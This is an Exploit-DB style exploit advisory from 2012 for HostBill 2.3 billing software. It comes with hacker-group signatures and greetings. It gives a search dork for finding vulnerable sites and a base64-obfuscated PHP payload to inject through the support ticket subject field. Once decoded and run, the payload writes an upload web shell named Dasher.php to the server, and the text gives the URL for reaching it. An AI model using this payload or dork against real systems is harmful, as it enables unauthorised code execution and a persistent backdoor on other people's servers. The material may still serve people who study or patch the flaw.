HostBill App 2.3 - Remote Code Injection

EDB-ID:

18428

CVE:





Platform:

PHP

Date:

2012-01-30


=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: suffering from RemotE injection php code
[~] Vendor:hostbillapp.com
[+] Software:HostBill
[+] Version : v2.3
[~] 
[+] author:Dr.DaShE
[~] TEAM: Team 403
[?] 
[-] contact: Dasher403[at]gmail.com
[?] Date: 2g.J4N.2oll 
[?] 
[?] T!ME: 04:46 AM ara-blackhat
[^] 
[?]
=============================================================================== 
# HostBill script suffering from RemotE injection php code exploit
=============================================================================== 


[!] Exploit Already Tested ... on apache linux server

Dork: Powered by HostBill

[^] Error console:-

http://localhost/billing/index.php?/tickets/new/
 
[?] poC <X> exploit:- 
 
http://localhost/billing/index.php?/tickets/new/

inject your evil php code exploit in subject field

encrypt by base64 encoder
ex:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq
MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS
aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2
SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ
anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp
QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3
blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs
SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl
eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI
ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J
K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJEYXNoZXIucGhwIiwidyIpOwpm
d3JpdGUoJGZvLCRjb2RlKTs='));{/php}

http://localhost/Dasher.php



 
 
[~]-----------------------------{(Team 403)}------------------------------------------------
# 
[~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ;
# 
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; 
# 
[?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ;
# 
[~]spechial FR!ND: they all are spechials ;) #; 
# 
[~] !'M 4R48!4N 3XPL0!73R. #; 
# 
[~](>D!R 4ll 0R D!E<) #; 
# 
[~]---------------------------------------------------------------------------------------------